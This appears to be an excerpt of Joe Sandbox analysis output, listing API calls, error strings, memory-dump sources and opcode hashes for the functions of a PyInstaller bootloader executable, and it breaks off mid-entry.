                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                          • Opcode ID: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
                                                                                                                                                                                                                          • Instruction ID: c312a6d2c1767073aede0e2e19b850bd1955c0469c60c5991906d2070224f392
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B51BF62A0C68281EBA2BB95A8503FA62D1BB85794F444135ED4DC7BD6EF3DE9038704

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF641F3E3BA,?,?,-00000018,00007FF641F3A063,?,?,?,00007FF641F39F5A,?,?,?,00007FF641F3524E), ref: 00007FF641F3E19C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF641F3E3BA,?,?,-00000018,00007FF641F3A063,?,?,?,00007FF641F39F5A,?,?,?,00007FF641F3524E), ref: 00007FF641F3E1A8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                          • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                          • Instruction ID: 5e78e2612ef6a5baa1b3e86634168ebf7101213be96f47287991743ce728c4d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5418932B1DA0681EB97BB16AD006A662D2BF45BA0F484135DD1DC7BC6EE3DE4478205

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF641F23834), ref: 00007FF641F27CE4
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF641F23834), ref: 00007FF641F27D2C
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27E10: GetEnvironmentVariableW.KERNEL32(00007FF641F2365F), ref: 00007FF641F27E47
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF641F27E69
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F37548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F37561
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F226C0: MessageBoxW.USER32 ref: 00007FF641F22736
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                          • API String ID: 740614611-1339014028
                                                                                                                                                                                                                          • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                          • Instruction ID: d7863684b3334d31b785ec8593a6861d63c60f856549600d73d5405be4ceeb65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04418021B1DA8641EBE3BB6199652F922D1AFA5780F804131DD1DC7BD6EE3DE5078200

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                          • Instruction ID: 101781c4f2b699e765868135dd38c4f1c1251a900781384f408d35ba28d4b7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1F172A1C68F91EBA2BB5594102BE7BD0FB90B80F550131DA4E83BD1CE7CE8578316

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                                                                                                          • Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                                                                                                                                          • Instruction ID: 170d6b46326493f127eb0a2762ba118922b22ac9c050c93cb2fd89c6b138e4a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5218531A0CE8241EB91BB65E84026AA3E1FF917A4F100335DA6D83BE5DF7DD4468700

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF641F23534), ref: 00007FF641F23411
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: GetLastError.KERNEL32(?,?,?,00007FF641F2342E,?,00007FF641F23534), ref: 00007FF641F22A14
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: FormatMessageW.KERNEL32(?,?,?,00007FF641F2342E), ref: 00007FF641F22A7D
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: MessageBoxW.USER32 ref: 00007FF641F22ACF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                          • API String ID: 517058245-2863816727
                                                                                                                                                                                                                          • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                          • Instruction ID: f1e14e5795f950f91e9bfbd4dfbd519f084b6c86a3b3b691a430538115aa4bf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9521B0A1B1C58281FBA3BB24E9013FA22D0BF98384F800232D65DC75E6EE2DE1068301

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: GetCurrentProcess.KERNEL32 ref: 00007FF641F27B70
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: OpenProcessToken.ADVAPI32 ref: 00007FF641F27B83
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: GetTokenInformation.KERNELBASE ref: 00007FF641F27BA8
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: GetLastError.KERNEL32 ref: 00007FF641F27BB2
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: GetTokenInformation.KERNELBASE ref: 00007FF641F27BF2
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF641F27C0E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: CloseHandle.KERNEL32 ref: 00007FF641F27C26
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF641F23814), ref: 00007FF641F2848C
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF641F23814), ref: 00007FF641F28495
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                          • API String ID: 6828938-1529539262
                                                                                                                                                                                                                          • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                                          • Instruction ID: 3ece64c6a430cb939ec2bdd1fab11a6bcca384e33e80e6dc0bcd47fc65d3badb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6213C31A1CA8692F792BB60E9153EA63E0FB98780F844435EA4D837D6DF3DD446C740

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF641F3C25B), ref: 00007FF641F3C38C
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF641F3C25B), ref: 00007FF641F3C417
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                          • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                          • Instruction ID: 85555b726a691344963a09d545ba15db66f83ad6fc4d1268d8289663ad0f509d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9891B032A1C65985F792FF69D4402BD2BE0BB54B88F14413ADE4EA7EC5EE38D4538702
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                          • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                          • Instruction ID: 4040b9923be3e93d8bd9114e31f88e817aa0b24e0a5af294847f2ca812f45ac0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41A122D1C78643F795BBA0D54036962A0FBA47A4F109334E69D83ED6DF6CA1E38705
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                          • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                          • Instruction ID: 675b66790f364f538da22db98ad6d6ecc0820223435f8e1ddf0d839f3399cdc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7314D39E4D68741FBE6FB6494123F913C1AF82784F940035E90EC76D7EE2EA9478215
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                          • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                          • Instruction ID: 60c450ef61f47b9ced75b986fde826f1f04bf96ab2ee56ff5c4ac135ec4324c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81D06720F6C60A87EB963F715D6917912915FA8701B502538D84A877D3CD2CA80B4345
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                          • Instruction ID: cac679e86ffda5a4bc88c4ceec7fe49bc8ecb48b84267d7e0491c92ed747f9d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C51D161B2D2C246EBAABF3694106BA66C1FF84BB4F144634DD6D87BD5CE3DE4038601
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                          • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                          • Instruction ID: f128860154aa27e4d48308c8272b7740cf3e3c34ce5dcea41019620460c01a14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B411C471A1CA8581DB91BB25E81417D63A1AB44BF4F544331EE7D87BEACE3CD0538709
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                          • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                          • Instruction ID: b6fc17f82ea6f7610bc2def2649a33250c391972a1e21e598bf871a10d6cc251
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E0E650F1D64B42FF967BF2A84517912D16FA4741B445034DD0DC7AD2DE2C64478211
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF641F39CE5,?,?,00000000,00007FF641F39D9A), ref: 00007FF641F39ED6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F39CE5,?,?,00000000,00007FF641F39D9A), ref: 00007FF641F39EE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                          • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                          • Instruction ID: 18d8f464eb712e42b4cd5932d4cba0afad96f0a6332c24223da145e9c2c84669
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26218421F1CA4A41FFD6B765A55037D22D16F84B90F045235D96EC7FD2CE6CA4838312
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                          • Instruction ID: 64365f96931cb2c451636e70aff85413b8bedb6a02fa4cc2de25a6efade4bcc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
